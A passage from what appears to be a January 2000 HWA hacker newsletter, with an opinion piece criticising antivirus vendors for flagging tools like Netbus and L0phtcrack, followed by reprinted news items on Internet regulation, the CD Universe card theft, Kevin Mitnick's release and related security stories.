virus and must be hunted down and destroyed. It was
easy, the enemy all wore the same uniform. Though some
were snipers waiting for a specific target and a specific
time. Other Viruses were experts at camouflage that could
stay undetected for months in the wild before being
flushed out, but they were all of the same army. Now it's
not so easy.

If you look at the anti-virus industry today, they seem to
be taking on the jobs of security cure all. As Weld Pond
mentioned in his Buffer Overflow article on 12/20/99, "The
scanners are scanning for more and more software that
does not contain virus or trojan code". This is becoming
more epidemic.

Who remembers the case of Netbus? In February '99
Netbus released version 2.0 to the public as shareware.
They removed many of the stealth features and changed
it's functionality so it was no longer a trojan horse but an
actual product from an actual company. It even achieved
a 5 cow rating on Tucows when released.

Well, about a month later, the A/V industry started listing
this new version of Netbus as a trojan, this action
prompted Tucows to remove Netbus 2.0 even after it
gave it's 5 cow approval. Ultraaccess.net, the makers of
Netbus, tried to talk to the A/V vendors after it was
listed, most would not even return their phone calls.
Panda was the only one to respond in any fashion to
ultraaccess.net. Data fellows and a few other vendors
didn't list it until the big vendors and "customer response"
prompted them to add it to their definitions.
Ultraaccess.net is not a large company, they have
however, hired a lawyer and are trying to get all their
legal material together for their next version release
sometime in spring next year, but it appears to be an
up-hill battle. (Thanks go to Judd Spence at Ultraaccess
for providing me with the history of Netbus.)

Another example of the A/V vendors logic is L0phtcrack.
L0phtcrack was released in 1997 and the latest version in
January 1999. It has since become one of the premier
tools for NT password auditing. L0phtcrack was recently
listed as a trojan by one company then others started
adding similar descriptions. A/V vendors follow each other
on their latest listings, when one company lists a new
piece of code, all the others just copy it, as was
mentioned by Weld Pond on NTBugtraq
(http://www.ntbugtraq.com/default.asp?
pid=36&sid=1&A2=ind9912&L=ntbugtraq&F=&S=&P=5026).
So if one company doesn't like your product they can
have it added to their definitions and all the other ducks
fall into a row and list the same program blindly.

These situations sound like classic David vs. Goliath
battles of the little developer being quashed by big
business. With certain A/V producers also having remote
administration products, does this not seem like a major
conflict of interest? What is to keep them from listing the
competition with muddy descriptions as virii and trojans to
scare and annoy the customer into using their product? In
talking to various security scanner companies I kept
hearing the same situation with Netbus; clients had
bought and paid for it, but their A/V package was
constantly deleting it. What sane person is going to
disable their virus protection so they can run a program?
Not a very good plan. This usually has the effect of
forcing the person to change remote administration tools
to one of the big names or to change A/V packages, but
since all the vendors share definitions your going to have
the same problem. This can severely hurt small business
with products like Netbus if their clients are getting
frightened with virus warnings. Yet, equally featured
products are never given a second glance.

If you feel your software was erroneously listed, there is
very little recourse in trying to talk to the companies to
have some action taken. The big vendors haven't returned
Ultraaccess.net's phone calls and the smaller vendors
follow the definitions of the big boys. So even if you
successfully remove yourself from one package, one has
to go to each vendor and plead your case all over again.
The A/V industry seems almost like a monopoly that can
do what it wants and list anything with impunity, always
falling back on the excuse of "customer demand" (though
this is how many programs get on the list in the first
place, but it's hard to verify if it's a legitimate response or
a conjured up one). It's gotten to the point where the
industry can make or break products.

With big companies like Symantec and NAI that have
interests in other products of their own, I can't believe
that they aren't abusing the public trust to leverage their
own products in the marketplace. Again, as Weld Pond
pointed out in his Buffer Overflow article "Symantec's
Norton AntiVirus will scan for the remote control programs,
NetBus or BO2K, but not the company's own PC
Anywhere. Network Associates' McAfee VirusScan will
detect the NT password auditing tool, L0phtCrack, but will
not detect the company's own vulnerability auditing tool,
Cybercop scanner, or their network sniffers, Sniffer Basic
or Sniffer Pro". If this is not using your product to force
another, I don't know what is.

The A/V industry is very necessary, but has gotten too
complex for it to continue in the current state. In the very
near future, any product that can be misused to any tiny
degree will be listed, and what recourse will companies
have to protect themselves from the abuses by the
industry?

I propose an agency, commission, organization, board,
watchdog group or something that all A/V vendors are a
part of and follow the decisions of, so you only have to
appeal your case to one group to clear your products
name. A sort of better business bureau for the industry.
Many A/V vendors belong to various Internet Security
Bodies but there is no body for Anti-Virus.

I also suggest a fourth category, separate from virus,
worm or trojan. A category of just programs, that only
alerts the user that a program is present that may
*possibly* be abused in some fashion. Present the user
with the option to find out more information about it or
acknowledge that it is supposed to be there and never
bug them about it again. Nothing scares a person more
than seeing INFECTED! or TROJAN! Applied to something
on their computer. A less frightening dialog that gives an
advisory that says there is a program on their computer
that could be a vulnerability would bring some sanity to
this problem. Some companies already have a similar
"exclude" feature but not all do and they still throw up
scary warnings. For the IT community, the ability to filter
definition files not to include programs that are supposed
to be there would make their lives easier, rather than
having their users freaking out at the Anti-Virus warnings.

I still feel it is important that if the A/V vendors insist on
detecting anything and everything that may be a
malicious tool that they don't play favorites, they should
list EVERYTHING, including their own products. Many of us
realize the merit of these fringe programs (most of which
are free) and use them in place of big named box products
but don't want to have to fight with our Anti-Virus
packages to use them, and should'nt have to.

People are demanding more and stranger things from their
computers and sometimes it's necessary to borrow code
from the book of virii and trojans to achieve this. The line
has blurred between a nasty piece of code and a great
product. Sometimes it's only the marketing that makes the
difference.

Renderman, 01/13/00
Www.Hackcanada.com
RenderMan@Hackcanada.com

@HWA

91.0 China Registering Businesses to Monitor the Net 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Corporate Internet users in China's commercial hub of
Shanghai have been told by Police to register their
connections in a nationwide drive to increase control
over the Web. "This is for safety," said an official of the
Huangpu district branch of the Public Security Bureau.
"In order to inspect the Internet, we must control it." (I
don't know whether to laugh or cry)

C|Net
http://news.cnet.com/news/0-1005-200-1518026.html?tag=st.ne.1002

China registering businesses to monitor Net
By Reuters Special to CNET News.com January 7, 2000, 11:10 a.m. PT

SHANGHAI--Police in China's commercial hub of Shanghai have told corporate
Internet users to register in a nationwide drive to increase control over
the Web.

The city's Public Security Bureau placed an advertisement in a local
newspaper, and at least one district had issued a directive ordering
companies using the Internet to register with police by Jan. 30, officials
said today.

"This is for safety," said an official of the Huangpu district branch of
the Public Security Bureau. "In order to inspect the Internet, we must
control it."

China exercises strict control over the Internet, blocking Web sites it
considers politically sensitive or pornographic.

Companies that fail to register could face fines of up to 50,000 yuan
($6,000), the official said. The police will charge no registration fee,
and individual users are not required to follow suit, the offical added.

The directive said registration would "strengthen the protection of safety
of computers and information."

Companies and other "work units" are being required to complete two forms
for police, giving email addresses and naming their Internet service
providers, documents showed.

Internet use has shown explosive growth in China, with some estimates
putting the number of Web surfers at more than 7 million by the end of last
year.

But the government has been alarmed by dissident groups and the banned
spiritual movement Falun Gong using the Internet for communication and
disseminating information.

@HWA

92.0 CD Universe Thief Threatens to Post more CC Numbers 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Maxus, the thief who stole hundreds of thousands of
credit card numbers from CD Universe is threatening to
release more of the numbers on a new web site. The FBI
is investigating.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2420863,00.html?chkpt=zdnntop

Data thief threatens to strike again

Computer intruder who tried to extort CD
Universe says he'll release more stolen credit
card numbers.

By Mike Brunker, MSNBC
January 11, 2000 3:49 PM PT

An e-mail author claiming
to be the thief who
released as many as 25,000
stolen credit card numbers
earlier this month told NBC
News he'll soon start
distributing more card
numbers on a new Web
site. "Maxus," aka "Maxim,"
claims to have stolen
300,000 credit card files
from online music retailer CD Universe. The site he
set up to hand out stolen card information was shut
down over the weekend, but a writer identifying
himself as the thief told NBC he'll open up a new
site "soon." In a separate note to MSNBC, the same
writer hinted part of his motivation was to criticize
e-commerce companies that don't do enough to
preserve users' privacy.

The heist sent shockwaves through the e-commerce
world over the weekend. The intruder, who claims to have
plundered 300,000 credit card numbers from an Internet
music retailer's computers, posted thousands of numbers
on a Web page after failing to force the company to pay
him $100,000. The FBI is investigating the theft and
attempted extortion, and the company, CD Universe, said
it was advising customers that their credit card data could
have been compromised.

Word of the extortion plot surfaced Friday, when the thief
contacted a California computer security firm and directed
employees to the Web site where he apparently had been
posting the credit numbers since Christmas Day. Asked
why he thought CD Universe refused to pay him the
$100,000, Maxus replied (sic), "They ... prefer money vs.
people privacy."

He also said he still has access to the CD Universe credit
card database and can still glean credit card numbers
from the site.

Brad Greenspan, chairman of eUniverse, the parent
company of CD Universe, said Monday that company
officials and an outside security firm it had hired were still
attempting to determine how the thief had made off with
the financial information. But he said there are reasons to
believe that other online retailers also could be vulnerable.

Other sites could be vulnerable
"The hacker has said that there's a flaw (in the ICVerify
software that CD Universe was using to process its
transactions) ... in a general sense, not just that he found
that flaw in our system," he told MSNBC.

Representatives of the
software maker,
CyberCash of Reston,
Va., did not return calls
Monday seeking
comment.

The New York Times reported that the extortionist, a
self-described 19-year-old from Russia using the name
Maxim, claimed in e-mails that he used some of the
credit card numbers to obtain money for himself.

On the Web site, which was shut down Saturday, the
thief said e-mail and faxes had been sent to the company
warning that he would publish the credit card numbers
and other information obtained through an unspecified
"security hole" in the company's e-commerce software.
"Pay me or I publish it," the thief claimed to have warned
the Wallingford, Conn.-based company by e-mail and fax.

CD Universe and its parent, eUniverse, said they were
working with the FBI to track the intruder.

Unauthorized purchases detailed
The company said it had not received any reports that
customers' credit card numbers had been used to make
unauthorized purchases.

But APBNews.com, an Internet publication focused on
crime, said it obtained 32 credit card numbers before the
Web site was removed and had verified at least two
fraudulent purchases -- one for $1,000 worth of computer
equipment and another for $1,250 worth of unspecified
goods -- from the more than a dozen victims it was able
to reach. One of those charges occurred on Saturday, the
day the extortionist's Web site was shut down and two

weeks after he posted his first credit card numbers.

APBNews also reported that two of the cardholders said
the card numbers that were posted on the site were
replaced and canceled months ago, indicating the stolen
database may have been old. Also, all of the credit cards
were due to expire between February and April 2000, it
said.

Customers contacted
Greenspan, the eUniverse chairman, said the company
was in the process of contacting its customers and
advising them of the theft.

"We're working with the credit card companies, and we
will be and are in the process of informing our users and
giving them the appropriate information so that they can
make an informed decision (on whether to cancel the
cards)," he said.

American Express Co. said Monday that its online fraud
guarantee will protect its customers from responsibility for
unauthorized online charges. In general, credit card
holders are responsible for only up to $50 of any
unauthorized charge.

And Sean Healy, a spokesman for VISA USA, said that
while individual banks have the final say on the matter, in
most cases there will be "no consumer liability" as a
result of the theft.

And while the story received plenty of media attention
after the New York Times ran it on the front page
Monday, the publisher of a credit card industry newsletter
said that the theft was essentially a "nonevent" that would
likely not even rate a mention in the next edition.

"I've been following the industry for 35 years, and credit
card fraud is at a historical low point (between 7 and 8
cents per $100)," said Spencer Nilson, whose Nilson
Report is circulated in 80 countries. "There is no system
that's ever been invented that doesn't cost more than the
fraud costs to prevent it."

Elias Levy of SecurityFocus.com, a computer security
firm that received e-mail from the "cracker" -- the term
preferred by law-abiding computer hackers for those who
put their skills to criminal use -- alerting it to the
existence of the Web site, said approximately 25,000 of
the stolen numbers were posted before the site was shut
down. Levy said the intruder claimed to have obtained the
database containing the credit card numbers by using a
security hole in ICVerify, the credit card processing
application.

"He was not very clear on what the security problem
was," Levy told MSNBC. "He claimed that he was able to
use the ICVerify software to take a charge from one
account and credit it to a different credit card -- basically
doing a money transfer. But this is not the same thing as
a hole being used to steal the credit cards in the first
place."

First numbers posted on Christmas
In the e-mail he sent to the Times, the hacker said he
sent a fax to the company last month offering to destroy
his credit card files in exchange for $100,000. When he
was rebuffed, he said, he began posting the numbers on
another Web site, called Maxus Credit Card Pipeline, on
Christmas Day.

The hacker e-mailed the Times the numbers for 198 credit
cards as proof of the theft. The newspaper said it
determined the numbers were real by contacting the
credit card owners, at least one of whom also confirmed
that she had used it to shop online at CD Universe.

Greenspan said company officials learned on Saturday
that the numbers had been posted to the Web site and
immediately contacted the FBI, which was able to get the
Web site, which was hosted by a Kirkland, Wash.,
Internet service provider, to remove it.

Like many online retailers, CD Universe rode a
burgeoning interest in online shopping at Christmas to
bust open sales projections for music, movies, videos and
games.

CD Universe's sales were $9.1 million last year and are
projected to rise to $16 million this year. For the Internet
as a whole, sales this past holiday season climbed more
than 300 percent from the previous year to as much as
$12 billion, above early expectations that sales would
double. Bob Sullivan contributed to this story.

@HWA

93.0 Army Plans on DMZs for Its Networks 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sarge
The Network Security Improvement Program (NSIP) has
mandated that all Army bases physically separate public
servers from those providing access to private Army
intranets. (This should be standard operating
procedure, surprised it has taken this long to get
done.)

Federal Computer Week
http://www.fcw.com/fcw/articles/web-dmz-01-12-00.asp

Army establishes Infowar "DMZ"

BY Bob Brewin
01/12/2000

The Army plans to establish network security demilitarized zones (DMZs) at all its
bases worldwide as part of a plan to beef up its cyberdefenses against network
intrusions and attacks.

The DMZs are planned under the Network Security Improvement Program (NSIP),
which was designed by the office of the Army's director of information systems for
command, control, communications and computers, which is headed by Lt. Gen.
William Campbell. Under NSIP, all Army bases and posts will have to physically
separate public servers from those providing access to private Army intranets,
according to an Army-wide message.

That message defined an information DMZ as "an electronic information area
physically or logically separated from [the Army base] into which such systems are
placed that have primary interface requirements with systems or users external [to
the base]. The purpose of the DMZ is to provide a defined and controlled degree of
access to information systems and services."

The NSIP message also stated that bases could establish multiple DMZs with varying
degrees of security, depending on the amount of access internal Army information
systems require to systems on public networks, such as the Internet, with all
servers protected against known vulnerabilities associated with operating systems
and hosted applications.

The message added that the Army eventually intends to establish a "more restrictive
Army[-wide] DMZ," but did not provide any further details.

@HWA

94.0 CBS Alters On Air Images During News 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by janoVd
CBS News has admitted to using digital technology to
alter images broadcast on their news programs The
Early Show and 48 Hours. So the technology has only
been used to insert large billboards or cover up
competitors' advertising. A spokesperson for CBS said
that each use the technology is examined for
impropriety. (Now we can no longer trust what we see
on TV. How long before manufacturing video for news
stories is common place?)

Nando Times
http://www.nandotimes.com/technology/story/body/0,1634,500153276-500188423-500797589-0,00.html

CBS News reportedly altering images to include network logos

NEW YORK (January 12, 2000 6:51 a.m. EST http://www.nandotimes.com) - CBS
News uses digital technology to project certain images during its shows,
including a network advertisement that covered the NBC Jumbotron during its
New Year's Eve coverage in Times Square, The New York Times reported
Wednesday.

The technology, which has become common in sports and entertainment
programs, has generally not been used on news shows.

However, CBS News is regularly using the technology on its "The Early Show"
and "48 Hours" programs, according to CBS news executives cited by the
newspaper. It was also used on "The CBS Evening News with Dan Rather" on
Dec. 30 and Dec. 31.

During the latter broadcast, the image of a billboard ad for CBS News was
inserted over a Budweiser ad and the large NBC screen located under the New
Year's ball, the Times reported.

Eric Shapiro, the director of the "CBS Evening News" and CBS News Special
Events, said he might use the technology again on the "Evening News." He
said the news division examines each case for impropriety before putting
virtual logos on the air.

"The technique, I find, works best if you put it someplace where there is
intended to be something," he said.

Rather knew about the use of the virtual technology during the New Year's
Eve broadcast and did not protest the practice, Shapiro said. "But he did
not know about it in advance," he added.

Among other places, the news show logos have been inserted on the sides of
buildings, on the back of a horse-drawn carriage in Central Park and in the
fountain outside the Plaza Hotel near the park.

"The Early Show" has used the technology almost daily since its Nov. 1
debut, making it appear that a large CBS advertisement is attached to the
General Motors building, where the show originates.

The use of similar technology sparked controversy in 1994, when ABC
journalist Cokie Roberts appeared in front of a picture of Capitol Hill.

Wearing a coat but actually in the network's Washington bureau, Roberts was
introduced by ABC News anchor Peter Jennings as reporting from the Capitol.
Neither network viewers nor Jennings knew that Roberts was actually
indoors.

Both Roberts and Rick Kaplan, then executive producer of "World News
Tonight," were reprimanded, and the network issued an on-air apology.

Representatives for NBC, ABC and Fox said their news departments did not
use digital technology during news broadcasts. A CNN spokeswoman told the
Times she knew of no time the technology had been used by the cable
network.

@HWA

95.0 Direct TV Service Stolen in Illinois 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
An Illinois man has been arrested and charged with two
counts of computer fraud, a Class 4 felony punishable
by up to three years in prison, for allegedly rigging
Direct TV satellite receivers. This crime was
investigated by the year old Illinois State computer
crime unit. (Something tells me that this guy was
caught because he was stupid (something blatant like
putting an ad in the paper) rather than any remarkable
skills displayed by the cyber crime squad.)

Lexis-Nexis
http://web.lexis-nexis.com/more/cahners-chicago/11407/5369541/3

SECTION: State and regional
LENGTH: 478 words
HEADLINE: Man charged in satellite signal thefts
BYLINE: Joe Mahr
DATELINE: SPRINGFIELD
BODY:
Move over cable companies satellite programming has also become a target
of TV channel thieves.

This week a Sangamon County man became the first person in the state
arrested by the Illinois Attorney General's office for allegedly rigging
satellite TV receivers. Larry Anders, 46, of Auburn was charged Friday
with two counts of the computer fraud, a Class 4 felony punishable
by up to three years in prison.

Anders allegedly charged area Direct TV subscribers $100 each to reprogram
their receivers to automatically get all of the pay-per-view channels
offered by the satellite service. Authorities believe such crime is
growing as satellite TV services expand their reach into a market
previously dominated by cable TV.

Programming fraud is nothing new. For years, cable TV companies have
fought viewers who pay for only basic services but used illegally
''descrambled'' receivers to get the premium programs.

Now, similar efforts are made with the satellite receivers, which use
computer cards to control what channels customers can access. The
technically savvy with the right computer equipment can reprogram the
cards to allow access to every channel, regardless of the customer's
subscription level.

''It's becoming more widespread because of easy access to the software via
the Internet,'' Attorney General Jim Ryan said in a prepared statement.

It's also part of a broader application of computers in all sorts of
crime, ranging from child pornography to credit card fraud.

''With the increase in technology, we're seeing it applied in the criminal
arena,'' said Sangamon County assistant state's attorney Steve Weinhoeft.

Satellite providers try to improve their security with every new model of
receiver, but some people still find ways to reprogram the cards. That has
caught the attention of Ryan's computer crimes unit, which was formed last
year.

''We are aware that there is a group of people working to decode the new
cards that come out, and we're going to be concentrating on that,'' said
Ryan's deputy chief of investigations, Chuck Redpath, who also is a
Springfield alderman.

In Anders' case, he allegedly sold a reprogrammed card to an undercover
investigator from the attorney general's office Thursday night. Redpath
said he's not sure how many people bought such reprogrammed cards from
Anders, but those people could face a charge of theft of services, a
Class A misdemeanor punishable by up to a year in jail.

And according to Redpath, Direct TV's own fraud investigators plan to
double-check the connections of its area subscribers to ensure no one is
stealing signals.

''I'm sure this is going to send shock waves to people who have had their
satellite dishes altered because if they catch you, you can be
prosecuted,'' Redpath said.

Joe Mahr can be reached at (217) 782-6882 or mahr(at)sj-r.com.

@HWA

96.0 Security Book Released on Net for Free 01/12/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
In an effort to provide administrators with high quality
and timely online technical content, Windows NT
magazine has decide to place their book Internet
Security with Windows NT on the internet for free. The
book will updated with new content as appropriate.

Windows NT Magazine
http://www.ntsecurity.net/forums/2cents/news.asp?IDF=200&TB=news

Call me dense, but I went to this site eagerly interested in checking
out this book and couldn't for the life of me bring it up, perhaps its
a Netscape foible or perhaps they just plain fucked up, ya I clicked on
the right places, i'll try it with MSIE and let you know .. hang on

@HWA

97.0 States Can't Sell Private Info 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime
The Driver's Privacy Law, a 1994 federal law limiting the
sale of personal information by states, has been
supported by the Supreme Court. The
precendent-setting case established that State owned
databases are subject to federal regulation as interstate
commerce just as any other commodity. Such
databases would include personal, identifying
information from drivers' licenses and motor vehicle
registrations. (This case has implications regarding not
only future state run databases but commercial ones
as well.)

ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2421349,00.html?chkpt=p1bn

Wired
http://www.wired.com/news/politics/0,1283,33611,00.html

Jan 12, 2000 12:01 PM PT
Feds allowed to limit sale of State
databases
In a precendent-setting case, the Supreme Court
upheld the Driver's Privacy Law, a 1994 federal
law limiting the sale of personal information by
states. The Court held that personal, identifying
information from drivers' licenses and motor
vehicle registrations is a "thing in interstate
commerce" that can be regulated by Congress
like any other commodity. States had argued that
the law violated their sovereign rights, but the
Court found, the law regulates State databases
as those owned by any other entity. "The
Supreme Court recognizes that there is a market
in personal information, and it has strongly
affirmed Congress' authority to regulate that
market to protect privacy," said Jim Dempsey,
senior staff counsel for the Center for Democracy
and Technology. "If Congress can establish
privacy rules to regulate personal information in
state government databases, it can surely
regulate commercial databases." -- Robert
Lemos, ZDNet News

-=-

Wired;

DMV Can't Sell Personal Info
by Declan McCullagh

12:55 p.m. 12.Jan.2000 PST
Motor vehicle agencies can be restricted
from selling the personal information on
drivers licenses, the US Supreme Court
unanimously ruled Wednesday in a widely
anticipated decision.

The justices said that a federal law
restricting departments of motor vehicles
from distributing their data to
corporations and direct marketers without
permission is constitutional, and
overturned an earlier appeals court
decision.

Congress enacted the Driver's Privacy
Protection Act (DPPA) in 1994, but South
Carolina attorney general Charlie Condon
sued the federal government to overturn
the measure. He argued it violated the
principles of federalism and separation of
powers, essentially saying the matter was
best decided by state governments and
that the feds should butt out.

The Supreme Court strongly disagreed.

"The DPPA does not require the States in
their sovereign capacity to regulate their
own citizens. The DPPA regulates the
States as the owners of databases,"
wrote Chief Justice William Rehnquist in
the 18 KB decision.

Legal scholars say what makes the case
important are not its privacy implications,
but how it affects the balance of power
between state and federal governments.

"This is part of a battle that was started
in the New York case about what
Congress can and cannot order states to
do," said David Post, a professor of law at
Temple University law school. "The real
issue is whether Congress can pass a
regulatory statute and force the state
governments to enforce it."

In New York v. United States, the
Supreme Court in part upheld and nixed a
1985 law that regulated state disposal of
low-level radioactive waste.

Eugene Volokh, a law professor at UCLA,
said the Supreme Court has maintained
the status quo.

"It's not a surprise that this is a 9-0
case. It's long been understood that the
federal government has the power to
control commerce, including commerce by
states, including the sale of information,"
says Volokh. "This just reaffirms that.
That court clarified something that had
been assumed all along."

Volokh said the 4th US Court of Appeals,
which concluded the DPPA violated
constitutional principles of federalism, has
been more inclined to side with states'
rights than other circuit courts.

The DPPA says that state governments
may not "knowingly disclose" such private
information, but there are many
exceptions and loopholes. For instance,
"any government agency" can obtain
drivers license information. So may
researchers, private investigators,
insurance companies, or impound yards.

Marketers may obtain the data as long as
states provide drivers "an opportunity, in
a clear and conspicuous manner, to
prohibit such uses."

Privacy and conservative groups
applauded the ruling.

"My initial reaction is that I'm surprised it
was unanimous, given that Rehnquist is
so strong on states' rights. I would have
[anticipated] that he would have ruled in
favor of the states. But I'm pleasantly
surprised that it was unanimous in favor
of the DPPA," said Lisa Dean, vice
president of the Free Congress
Foundation.

@HWA

98.0 Mitnick Free Next Friday 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Kevin Mitnick is set to be released from federal prison
next Friday. While his family and supporters will
celebrate the occasion what sort of life can Kevin look
forward to? Will the court order preventing him from
accessing computer equipment help in his reform? Kevin
Poulsen examines these questions in his ZD Net article.

Chaos Theory
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2128328,00.html

Mitnick�s Digital Divide

It�s the year 2000, and Kevin Mitnick is
going free. The problem is, he�ll be
trapped in 1991.
By Kevin Poulsen January 12, 2000

On Friday, January 21, hacker Kevin
Mitnick will go free after nearly five years
behind bars. But when he walks out the
gates of the Lompoc federal correctional
institution in California, he'll be burdened
with a crippling handicap: a court order
barring him for up to three years from
possessing or using computers,
"computer-related" equipment, software,
and anything that could conceivably give
him access to the Internet.

These anti-computer restrictions are even
more ridiculous today than when I faced
them upon leaving federal custody in
June, 1996.

In the wired world of 2000, you'd be hard
pressed to find a job flipping burgers that
didn't require access to a computerized
cash register, and three years from now
McDonald's applicants will be expected to
know a little Java and a smattering of
C++.

Since Mitnick's
arrest in 1995,
the Internet
has grown from
a hopeful ditty
to a deafening
orchestral roar
rattling the
windows of
society. The
importance of
computer
access in America has been acknowledged
by the White House in separate initiatives
to protect technological infrastructure
from "cyberterrorists," and to bridge the
so-called digital divide between
information haves and have-nots. "We
must connect all of our citizens to the
Internet," vowed President Clinton last
month.

He was not referring to Kevin Mitnick.

Mitnick, dubbed the "World's Most
Notorious Hacker" by Guinness, pleaded
guilty on March 26 to seven felonies, and
admitted to cracking computers at cellular
telephone companies, software
manufacturers, ISPs, and universities, as
well as illegally downloading proprietary
software. Though he's never been
accused of trying to make money from his
crimes, he's been in and out of trouble for
his nonprofit work since he was a
teenager.

So, the theory goes, keeping Mitnick
away from computers will deprive a known
recidivist of the instruments of crime and
set him on the road to leading a good and
law-abiding life.

I've heard that theory from prosecutors,
judges and my (then) probation officer.
They all compare computers to lock picks,
narcotics, and guns-� everything but a
ubiquitous tool used by a quarter of all
Americans and nearly every industry.

Mitnick, we should believe, will be
tempted in the next year or so to crack
some more computers and download some
more software. But when the crucial
moment comes for him to commit a felony
that could land him in prison for a decade,
his fingers will linger indecisively over the
keyboard as he realizes, "Wait! I can't use
a computer! My probation officer will be
pissed!"

The fact is, if Mitnick chooses crime, he
won't be deterred by the 11 months in
prison that a technical supervised release
violation could carry. These conditions
only prevent him from making legitimate
use of computers.

Mitnick's rehabilitation is up to him. But
the system shouldn't throw up
obstructions by keeping him away from
the mainstream, on the sidelines, and out
of the job market. His probation officer will
have the power to ease his restrictions,
perhaps by allowing him to get a computer
job with the informed consent of his
employer. That would be a good start.

January 21 will be a happy day for
Mitnick, his family, and friends. But
getting out of prison after a long stretch
carries challenges too. Nobody is served
by stranding the hacker on the wrong side
of the digital divide.

@HWA

99.0 Internet Banned From Jewish Homes 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Dildog
The ultra-orthodox Council of Torah Sages (an
important leadership group in the Jewish community,
based out of Israel) signed a ruling banning the Internet
from the homes of all Jews. The ultra-orthodox
constitute less than 1%" of the total Jewish community
in Israel, however, it is unknown how much influence
over the rest of the community the council has.

Wired
http://www.wired.com/news/culture/0,1284,33583,00.html

Fahrenheit 451, Jerusalem Style
by Tania Hershman

3:00 a.m. 13.Jan.2000 PST
JERUSALEM -- The Internet ban issued by
leading ultra-Orthodox rabbis last week
has not prompted a great outcry within
Israel's ultra-Orthodox community, where
television was outlawed decades ago.

"There needed to be a ban," says
Deborah Spier, the mother of nine
children aged between 2 months and 15
years who stopped to read the
announcement of the ruling posted up
around Jerusalem's ultra-Orthodox Mea
Shearim neighborhood. "Children use the
computer at 2 a.m. and you have no idea
what they are doing. You can't control
it."

While she has a computer (but no
television) at home, Spier's family is not
and has never been connected to the
Internet. Her children don't mind. "I have
a teenage son who enjoys computers and
has a lot of games, but the children
themselves felt that it was taking over,"
she said. "You can say that you are
denying children, but they have other
ways of finding information. There are
libraries."

The ruling, signed by 30 rabbis from
different ultra-Orthodox communities,
expressly forbids Internet connections at
home and states, in fact, that "the
computer should not be used for
entertainment at all." However, those
"whose livelihood depends on it" are
allowed access to the Internet in the
workplace, with "the responsibility not to
let others use it."

Is its aim simply to shield children from
unsuitable material? "I don't think it is
only for children," says Spier, but blushes
rather than mention who else might be in
need of "protection" and from what sort
of online temptation.

Chaim Mor, who runs the Torah Scholar
Software store on a cobbled Mea Shearim
shopping street, agrees that it is not just
children who are perceived to be at risk.
"Children range in age up to 120," he
says.

He does not believe this ruling is
controversial. According to him, many
ultra-Orthodox homes have PCs, but few
have Internet connections. "The people
that have the Internet have it for
work-related reasons," he said. "A lot of
people are involved in the computer field
or people want access to Jewish and
Torah sites."

Torah Scholar Software itself sells some
of its merchandise online through Jewish
Software, just one of thousands of
Jewish sites. Others are the Shema
Yisrael Torah Network and Jewish Chat.

These sites demonstrate that the
Internet's value for disseminating
information is not lost on the Jewish
community. Aish HaTorah, for example --
an Orthodox organization with the stated
purpose of "outreach" to non-observant
Jews -- has a Web site filled with all
types of religious content, from the
Jewish take on Y2K to online religious
study courses, and even an "Ask the
Rabbi" feature.

"I definitely understand the concerns that
the religious world is feeling," says Aish
HaTorah's director of development, Rabbi
Ephraim Shore. "The potential for
damage, especially for young people, is
huge. And this is not confined to the
religious world. The No. 1 use of the Web
today is pornography. Do most parents
want to make this available to their
children?"

"However," he continued, "at the same
time, the upside potential for learning and
education is probably equally as huge.
While I understand where the [orthodox]
rabbis are coming from, I believe that
there are ways to moderate and control
Internet use using different programs
available."

One way to do this may be through ISPs
such as Koshernet, which labels itself a
"safe and kosher link to the Information
Superhighway."

Koshernet only allows subscribers to
access sites that have already been
passed by their site-checkers. Currently,
Koshernet is only available in the US and
Canada, but it is expanding to the United
Kingdom and France. It expects to be
available in other European countries and
Israel by the end of 2000.

"The Koshernet was established to give a
solution for anyone who needs to use the
Internet for work and business, but
doesn�t want to be exposed to offensive
material," said president Jacob Gubits.
"Since our establishment 3 years ago, we
have the full support of the rabbinical
authorities of different communities."

Regardless of whether Koshernet takes
off, Aish HaTorah is expanding its Web
presence and hopes for one million
visitors a month when the new site ("the
Amazon.com of the Jewish World," boasts
Shore) is launched in a few weeks.

"I think personally that to ignore the
Internet is to put blinders up. It is going
to be there anyway," he says. "I think
that the opportunity for Jewish education
on the Web may be the biggest
opportunity for the Jewish people in years
-- maybe ever. The potential for
outreach is endless. We have never had
that opportunity before.

@HWA

100.0 NJ Teens Steal CC Numbers 01/14/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Four teenagers in New Jersey have been arrested and
charged with fraud, conspiracy, credit card theft and
receiving stolen property. The boys, aged 14 to 16,
tricked customers of AOL to reveal their personal
information including credit card numbers. The teens
then used the numbers to order items that where
shipped to unoccupied houses.

Nando Times NJ Teens Steal CC Numbers
http://www.nandotimes.com/technology/story/body/0,1634,500153859-500189471-500804836-0,00.html

N.J. teens charged with tricking Internet users out of credit card numbers

GALLOWAY TOWNSHIP, N.J. (January 13, 2000 7:00 a.m. EST http://www.nandotimes.com)
- Four teenage boys have been charged in what police say was an Internet scam
using stolen credit card numbers to defraud hundreds around the country.

